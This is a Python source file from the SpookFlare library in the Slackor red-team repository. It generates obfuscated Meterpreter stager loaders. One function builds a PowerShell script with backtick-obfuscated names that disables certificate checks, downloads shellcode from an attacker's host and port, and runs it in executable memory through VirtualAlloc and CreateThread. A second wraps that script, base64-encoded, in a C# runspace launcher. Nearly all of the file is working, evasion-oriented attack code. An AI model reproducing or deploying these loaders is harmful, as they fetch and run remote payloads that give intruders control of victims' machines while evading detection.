github.com/n00py/Slackor@v0.0.0-20200610224921-d007fcea1740/SpookFlare/lib/sfmpps.py (about)

     1  # -*- coding: utf-8 -*-
     2  import random
     3  import string
     4  import base64
     5  from base64 import b64encode
     6  
     7  def randomString():
     8      return ''.join([random.choice(string.ascii_letters) for n in range(12)])
     9  
    10  def checksum8(s):
    11  	return sum([ord(ch) for ch in s]) % 0x100
    12  
    13  def genHTTPChecksum():
    14  	chk = string.ascii_letters + string.digits
    15  	for x in range(64):
    16  		uri = "".join(random.sample(chk,3))
    17  		r = "".join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))
    18  		for char in r:
    19  			if checksum8(uri + char) == 92:
    20  				return uri + char
    21                  
    22  def generateMPPSLoader(mpProto, mpLhost, mpLport, mpArch, mpSsize):
    23      if mpArch == "x86":
    24          mpArch = "ToInt32"
    25          mpDef = "UInt32"
    26      elif mpArch == "x64":
    27          mpArch = "ToInt64"
    28          mpDef = "UInt64"
    29      
    30      if mpProto == "https":
    31          mpPSSSLChk = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"
    32      else:
    33          mpPSSSLChk = ""
    34  
    35      loaderHost = mpProto+"://"+mpLhost+":"+mpLport+"/"+genHTTPChecksum()
    36      baseMetPs = '''${0} = @"
    37  [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, {8} dwSize, {8} flAllocationType, {8} flProtect);
    38  [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, {8} dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, {8} dwCreationFlags, IntPtr lpThreadId);
    39  [DllImport("kernel32.dll")] public static extern {8} WaitForSingleObject(IntPtr hHandle, {8} dwMilliseconds);
    40  "@;
    41  {10}
    42  ${1} = New-Object "`N`et.`W`ebc`l`i`ent";${1}.Headers.Add("User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)");${1}.Headers.Add("Accept", "*/*");${1}.Headers.Add("Accept-Language", "en-gb,en;q=0.5");[Byte[]] ${2} = ${1}."D`o`wn`l`oa`d`Data"("{9}");${3} = New-Object byte[] (${2}.Length - {4});[Array]::Copy(${2}, {4}, ${3}, 0, (${2}.Length - {4}));${5} = A`d`d-T`y`p`e -memberDefinition ${0} -Name "Win32" -namespace `W`in`3`2`F`un`ct`i`on`s -passthru;${6}=${5}::VirtualAlloc(0,${3}.Length,0x3000,0x40);[Runtime.InteropServices.Marshal]::Copy(${3}, 0, [IntPtr](${6}.{7}()), ${3}.Length);${5}::CreateThread(0,0,${6},0,0,0) | oUT-NuLl;`S`T`A`R`T-`S`l`e`E`p -s `8`6`4`2`0'''
    43  
    44      loaderFinal = baseMetPs.format(randomString(), randomString(), randomString(), randomString(), mpSsize, randomString(), randomString(), mpArch, mpDef, loaderHost, mpPSSSLChk)
    45      return loaderFinal
    46  
    47  def generateMPPSCsharpLoader(mpPsCode):
    48      mCsharpCode = '''using System;
    49  using System.IO; using System.Diagnostics; using System.Reflection; using System.Runtime.InteropServices; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text;     
    50  public class {0} {{
    51      public static void Main() {{
    52          byte[] {1} = Convert.FromBase64String("{6}");
    53          string {2} = Encoding.UTF8.GetString({1});
    54          Runspace {3} = RunspaceFactory.CreateRunspace();
    55          {3}.Open();
    56          RunspaceInvoke {4} = new RunspaceInvoke({3});
    57          Pipeline {5} = {3}.CreatePipeline();
    58          {5}.Commands.AddScript({2});
    59          {5}.Invoke();
    60          {3}.Close();
    61          return;
    62      }}
    63  }}'''
    64  
    65      loaderFinal = mCsharpCode.format(randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), b64encode(mpPsCode.encode()))
    66      return loaderFinal